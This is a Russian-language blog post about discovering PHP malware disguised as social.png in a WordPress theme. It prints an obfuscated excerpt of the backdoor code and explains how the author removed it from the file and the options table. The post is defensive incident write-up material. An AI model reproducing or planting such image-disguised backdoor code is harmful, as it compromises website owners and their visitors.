Не давно просматривал свои локальные сайты, и услышал вопль антивируса. Вирус на сайте! Я был удивлен дважды. Во-первых, я не ожидал, что мой бесплатный антивирус авира может искать php вирусы, а во вторых был удивлен видом вируса.
Ругался мой антивирус на сам архив с wordpress темой, после недолгого осмотра информации о вирусе, нашел что сам зараженный файл является…..png картинка, а конкретно social.png, расположенная в теме.
Я сразу вспомнил первый курс колледжа, как мы с однокурсниками читали статьи провирусы, про то как их прячут. Но много воды утекло с тех пор, и я давно не встречал так спрятанных вирусов.
Первым делом я решил просмотреть что же внутри, естественно сама картинка не открывалась, и я поменял ее раcширение на php, получил — social.php.
Далее я открыл этот файл редактором Sublime Text, и понял что был прав.
Вот кусок из этого файла
@ini_set('max_execution_time', 300); @set_time_limit(0); error_reporting(0); ini_set('display_errors', 0); if (!defined('WP_CLIENT_KEY')) { class rGTkClojOnuDcNhbfnVM { private $JMlftQTPsAAdMedcNTHL, $bJdkeISkWEEkWpqVAfPR, $jiYtwUhvULNWtJKGbvk; private $PtzgKSpholDuOJetI; public function __construct( $oZqvPsyBPjyJxsaimqQq = 'old' ) { if ( class_exists( 'JFactory' ) ) { $this->PtzgKSpholDuOJetI = JFactory::getDbo(); } if ( $oZqvPsyBPjyJxsaimqQq == 'new' ) { $this->HoHhBuikDVEZaVTqmExm(); } else { $this->lzSaqyGAoZNIXqdEJHCQ(); } $this->bJdkeISkWEEkWpqVAfPR = '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6K/I2l6k2Iz7Vojzxk5Q
43QNfIJm2jWPvXAvFtft+yy4rD3MseQJWx3PLlkoRQjSI1uiiwwlPZWED0e5wFet
nS5tKhvvRaOeUPYJq6MtyUbnaMn7bshlgaAlPaUCVdAOjdtGHMuFaWfnBLgTSu3c
uccVC2zOlXx7XK1tw39eZepRemoh0W3Qhf+hDFsEzACSBmKhBiganwCZzTDvyXpj
nfbRKbf26LJDJ9u2Choh768vQiIfuf0tGLQ+xxcBDl2ZVW0P76cd5I2v+lYRBD/X
vgU32/UZeKDheA8M/oZ5/yFv5QWAU2SHEEKYfLkAQmXs/oRGqMQONqoL3W5Q4bE/
gQIDAQAB
-----END PUBLIC KEY-----';
Первая мысль от увиденного — удалить, после проделанной манипуляции (удления файла с сайта) сайт работал, но выводились ошибки
Warning: include(assets/img/social.png): failed to open stream: No such file or directory in /var/www/admin/www/
Warning: include(): Failed opening ‘assets/img/social.png’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear’) in /var/www/admin/www/
Warning: session_start(): Cannot send session cookie — headers already sent by (output started at /var/www/admin/www/
Warning: session_start(): Cannot send session cache limiter — headers already sent (output started at /var/www/admin/www/
Т.е. само наличия файла обязательно, не проблема я удалил весь код из файла social.png и запретил в правах файлов запись в файл.
Но это лишь пол решения проблемы, если проанализировать код вируса, видно что использовались запросы к бд. И наиболее не пирятным оказалось что использовались запросы на добавление в бд , вида — INSERT INTO OPTIONS (value, option_name) VALUES(:value, :option)».
Решено было просмотреть бд, а именно таблицу options , поиском по «BEGIN PUBLIC KEY»
Я нашел запись в этой таблице и благополучно удалил. После всего этого поставил плагин для WP — Antivirus, плагин интересный, особенно понравилась проверка сделанная на AJAX.
Итог, проверяйте ваши темы антивирусником, можно попробовать загрузить архив на вирустотал, темы старайтесь брать из проверенных источников, а также пользуйтесь скриптом ai-bollit, ставте хорошие и надежные пароли на админку, ftp и базу. Совокупность этих методов помогут держать в безопасности ваш сайт.
